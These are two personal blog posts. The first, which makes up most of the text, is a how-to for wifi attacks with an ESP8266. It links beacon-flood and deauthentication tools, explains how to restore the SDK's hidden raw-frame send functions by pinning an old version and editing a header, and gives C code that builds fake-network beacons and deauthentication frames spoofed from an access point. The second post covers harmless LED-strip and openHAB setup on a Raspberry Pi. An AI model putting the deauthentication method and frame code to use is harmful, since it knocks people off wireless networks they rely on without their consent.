February 28, 2016

Hacking with ESP8266

I wasn't too active here in the last year, and the main reason is that I started a master's in IT Security, so my projects became less electronics oriented. But now I had some time to play with my ESP8266 modules and try out some hacking with them. The module I'm using is listed as "NodeMcu Lua WIFI Internet Things development board based ESP8266 CP2102 module" on ebay and costs $5. I really like it, because it can be programmed over a normal USB cable, and all the connections are easily accessible:

Creating a lot of fake access points

Technically it does not create any access points, but if you list the available networks with your phone or computer you will see a lot of them, all with random names and no encryption. The ESP8266 does this by sending beacon frames, the same kind of frames routers use to advertise their wifi networks; a scanning client has no way to tell that nothing is listening behind the advertised BSSID. The original blogpost I was following is here: http://ruralhacker.blogspot.it/2016/01/esp8266-jamming.html and the code is here: https://github.com/kripthor/WiFiBeaconJam It worked for me flawlessly.

Disconnecting everyone from the wifi

There is a well-known attack against wifi networks: it is pretty easy to forge a deauthentication frame in the name of the access point and send it to the clients, and they will drop the connection (and usually try to reconnect). This works because management frames are neither encrypted nor authenticated, unless the network uses 802.11w protected management frames. I was using this code from github: https://github.com/RandDruid/esp8266-deauth but it took me a while to make it work.
The problem is that the developers of the ESP8266 SDK do not really want us to send this type of frame with the module. They (accidentally) added the functionality in SDK v1.3.0 but removed it again in v1.5.0, so we have to use v1.3.0. To do this with the Arduino IDE I did the following:
  • I used a freshly downloaded Arduino 1.6.5
  • Then I added the staging version of esp8266 to Board Manager (more info: https://github.com/esp8266/Arduino)
  • I installed the ESP8266 boards version 2.0.0-rc2 from the Board Manager (the version that appears in the path below). The version is really important, because that release bundles SDK v1.3.0.
  • Then I edited user_interface.h, because although the functions are present in the SDK's binary libraries, they are not declared in the header files. On my machine (Ubuntu) the file was at ~/.arduino15/packages/esp8266/hardware/esp8266/2.0.0-rc2/tools/sdk/include/user_interface.h.
    I simply added the following lines to the end of the file (before the #endif):
    typedef void (*freedom_outside_cb_t)(uint8 status);
    int wifi_register_send_pkt_freedom_cb(freedom_outside_cb_t cb);
    void wifi_unregister_send_pkt_freedom_cb(void);
    int wifi_send_pkt_freedom(uint8 *buf, int len, bool sys_seq);
After that the code from github compiled fine, and it works now. The sketch scans for an access point with an associated client, notes the pair, and then sends deauthentication frames spoofed from the access point to that specific client.
I have also tried to run the improved version that uses two ESP8266 modules (https://github.com/RandDruid/esp8266-deauth2), but I couldn't make it work so far.
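The two frames discussed above, a beacon advertising a fake open network and a deauthentication frame spoofed from the access point, as an added example that is not code from WiFiBeaconJam or esp8266-deauth. It builds the raw 802.11 byte layout on a host, where the fields can be inspected; the MAC addresses, the SSID generator and the function names are my own sample values. On the module, the finished buffer is what wifi_send_pkt_freedom from SDK v1.3.0 would be given.

```c
/*
 * Added example (not code from WiFiBeaconJam or esp8266-deauth): builds the
 * raw 802.11 management frames those sketches transmit. It runs on a host
 * and only constructs the bytes; on the ESP8266 with SDK v1.3.0 the buffer
 * would be passed to wifi_send_pkt_freedom(buf, len, false).
 * MAC addresses below are made-up sample values.
 */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define FRAME_MAX 256

/* Sample addresses (constructed, not real devices). */
const uint8_t EXAMPLE_BSSID[6]  = {0x02, 0x11, 0x22, 0x33, 0x44, 0x55};
const uint8_t EXAMPLE_CLIENT[6] = {0x02, 0xaa, 0xbb, 0xcc, 0xdd, 0xee};

/* 24-byte management header: frame control, duration, addr1..3, sequence control. */
static size_t put_mgmt_header(uint8_t *out, uint8_t subtype, const uint8_t *addr1,
                              const uint8_t *addr2, const uint8_t *bssid, uint16_t seq)
{
    out[0] = (uint8_t)(subtype << 4);       /* version 0, type 0 (management), subtype */
    out[1] = 0x00;                          /* flags: not to/from DS, no protection */
    out[2] = 0x00; out[3] = 0x00;           /* duration */
    memcpy(out + 4,  addr1, 6);             /* receiver */
    memcpy(out + 10, addr2, 6);             /* transmitter: the address we are spoofing */
    memcpy(out + 16, bssid, 6);
    out[22] = (uint8_t)((seq << 4) & 0xff); /* sequence control, little-endian: */
    out[23] = (uint8_t)((seq >> 4) & 0xff); /* fragment 0 in the low nibble, seq above it */
    return 24;
}

/* Beacon: broadcast from a BSSID, advertising an open (Privacy bit clear) network
 * on `channel`. Returns the frame length, or 0 if the SSID or buffer is unusable. */
size_t build_beacon(uint8_t *out, size_t cap, const uint8_t *bssid,
                    const char *ssid, uint8_t channel, uint16_t seq)
{
    static const uint8_t broadcast[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff};
    static const uint8_t rates[8] = {0x82, 0x84, 0x8b, 0x96, 0x24, 0x30, 0x48, 0x6c};
    size_t ssid_len = strlen(ssid);
    if (ssid_len == 0 || ssid_len > 32 || cap < 24 + 12 + 2 + ssid_len + 10 + 3)
        return 0;
    size_t n = put_mgmt_header(out, 8, broadcast, bssid, bssid, seq);
    memset(out + n, 0, 8); n += 8;          /* timestamp (real APs fill this in hardware) */
    out[n++] = 0x64; out[n++] = 0x00;       /* beacon interval: 100 TU */
    out[n++] = 0x01; out[n++] = 0x00;       /* capability: ESS set, Privacy clear => open */
    out[n++] = 0x00; out[n++] = (uint8_t)ssid_len;            /* SSID element */
    memcpy(out + n, ssid, ssid_len); n += ssid_len;
    out[n++] = 0x01; out[n++] = 0x08; memcpy(out + n, rates, 8); n += 8; /* supported rates */
    out[n++] = 0x03; out[n++] = 0x01; out[n++] = channel;     /* DS parameter set */
    return n;
}

/* Deauthentication: addressed to one client, transmitter spoofed as the AP.
 * Reason 7 ("class 3 frame from non-associated station") is the usual choice. */
size_t build_deauth(uint8_t *out, size_t cap, const uint8_t *client,
                    const uint8_t *ap, uint16_t reason, uint16_t seq)
{
    if (cap < 26) return 0;
    size_t n = put_mgmt_header(out, 12, client, ap, ap, seq);
    out[n++] = (uint8_t)(reason & 0xff);    /* reason code, little-endian */
    out[n++] = (uint8_t)(reason >> 8);
    return n;
}

/* Random-looking SSID from a small LCG, so the "many fake APs" effect is
 * reproducible on a host; len is capped at 32, the 802.11 maximum. */
size_t make_random_ssid(char *dst, size_t len, uint32_t *state)
{
    static const char alphabet[] = "abcdefghijklmnopqrstuvwxyz0123456789";
    if (len > 32) len = 32;
    for (size_t i = 0; i < len; i++) {
        *state = *state * 1664525u + 1013904223u;
        dst[i] = alphabet[(*state >> 24) % (sizeof alphabet - 1)];
    }
    dst[len] = '\0';
    return len;
}

int main(void)
{
    uint8_t frame[FRAME_MAX];
    char ssid[33];
    uint32_t rng = 1;
    for (uint16_t i = 0; i < 3; i++) {       /* three fake networks on channel 6 */
        make_random_ssid(ssid, 8, &rng);
        size_t n = build_beacon(frame, sizeof frame, EXAMPLE_BSSID, ssid, 6, i);
        printf("beacon %s: %zu bytes\n", ssid, n);
    }
    size_t n = build_deauth(frame, sizeof frame, EXAMPLE_CLIENT, EXAMPLE_BSSID, 7, 0);
    printf("deauth: %zu bytes, fc=%02x reason=%u\n", n, frame[0], frame[24]);
    return 0;
}
```

The beacon leaves the Privacy capability bit clear, which is why the fake networks show up as open, and the deauth frame puts the access point's address in the transmitter field, which is the whole trick: the client has no way to check who really sent it unless 802.11w is in use.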

February 16, 2016

Setting up a random Chinese RGB led strip with Raspberry Pi using lirc

So I have ordered one of these RGB led strips from aliexpress:
It has an IR remote, but I wanted to integrate it into my home automation project, and so far it is going well.

First I installed lirc (Linux Infrared Remote Control) using this tutorial: http://alexba.in/blog/2013/01/06/setting-up-lirc-on-the-raspberrypi/ I also had to update my firmware using this method: http://alexba.in/blog/2013/01/04/raspberrypi-quickstart/

irrecord recorded the codes of the remote nicely, and now I can control the strip from the command line.

I also installed lirc_web from here: https://github.com/alexbain/lirc_web I had some problems making it start automatically at boot (I was using this tutorial: http://alexba.in/blog/2013/11/02/lirc-web-nginx-and-upstart/). I had to change the line "exec /usr/local/bin/node /home/pi/lirc_web/app.js 2>&1 >> /var/log/open-source-universal-remote.upstart.log" to "exec /usr/bin/node /usr/local/lib/node_modules/lirc_web/app.js 2>&1 >> /var/log/open-source-universal-remote.upstart.log", because on my system both the node binary and app.js live in different places than the tutorial assumes. (Note that with the redirections in this order stderr still goes to upstart's original stdout rather than to the log file; writing ">> /var/log/open-source-universal-remote.upstart.log 2>&1" captures both streams.)

Openhab

It wasn't running for me at first, because some of its files were owned by root, while the service has to be started as the openhab user. Here are the commands that solved it:
cd /etc/openhab (or wherever you installed it)
sudo chown -R openhab:openhab .
sudo su openhab -c 'service openhab start'